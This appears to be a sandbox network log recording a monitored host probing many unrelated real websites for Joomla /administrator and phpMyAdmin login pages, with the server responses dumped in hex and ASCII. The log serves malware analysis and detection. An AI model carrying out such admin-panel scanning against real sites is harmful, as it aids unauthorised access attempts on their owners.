2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 Data Ascii: border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:wh
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f Data Ascii: lor:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='glo
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 Data Ascii: ry-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(
2024-02-20 23:26:11 UTC	1369	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 Data Ascii: p--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	59069	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	282	OUT	GET /administrator/index.php HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://strategicimpact.com.au/administrator/
2024-02-20 23:26:11 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:11 GMT Connection: close
2024-02-20 23:26:11 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	59220	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	227	OUT	GET /administrator/index.php HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://m-viper.de/administrator/
2024-02-20 23:26:11 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:11 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.6	59642	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XGLIHcDv7Ih5E3ilY92Y7Rg4BJf0ODQGEUyy0IHVoY/+g0z80NuZOMcboEM+5dqoO0fDkKOzUmnbdxmu8yICsQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:11 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.6	59515	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	180	OUT	GET /administrator/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.6	59582	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	171	OUT	GET /phpmyadmin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	182	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/phpmyadmin
2024-02-20 23:26:11 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.6	59612	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	394	OUT	GET /administrator/index.php HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cfgteam.com/administrator/
2024-02-20 23:26:11 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h2yFoVbBEx0h4E2rHCPkGSf+DPA+5IMX0tCSnPiL4SRzZY6/CZmXGPLcFHfr6Uwy4HqwOK3B2e51OB/TVM9S0g Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:11 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.6	59700	185.39.146.199	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	781	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:11 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=4oepmtnacbc56bk75h7rvg7kra; expires=Fri, 10-Jun-2078 22:52:22 GMT; Max-Age=1713655571; path=/; secure; HttpOnly; SameSite=None location: https://www.markoren.no/phpmyadmin/ access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-length: 0 content-type: text/html; charset=iso-8859-1 x-backend: server2 x-type: customer x-varnish: 949056530 age: 0 x-server: varnish-2 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.6	59781	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	172	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Vj2pctoaSbmmlRbqnzgxNpeK/f1MTb8E1BWE4hmCK7/lI6Qq5+nJwJe6ltZF33LkepYIMoF7CGtBTdNwfRUwIg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:11 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.6	59830	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	249	OUT	GET /administrator/index.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://norwegischlernen.info/administrator/
2024-02-20 23:26:12 UTC	406	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: https://norwegischlernen.info/administrator/ content-length: 0 date: Tue, 20 Feb 2024 23:26:11 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	59921	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_XGLIHcDv7Ih5E3ilY92Y7Rg4BJf0ODQGEUyy0IHVoY/+g0z80NuZOMcboEM+5dqoO0fDkKOzUmnbdxmu8yICsQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:11 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.6	59869	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:11 UTC	184	OUT	GET /administrator/ HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:12 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2sfbr3svhvfp7ver4b9q8pjchg; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:12 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	60840	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:12 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:12 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:12 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: phpMyAdmin_https=4i1sggv7vn9n89n6pl5o2h8dgn; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict
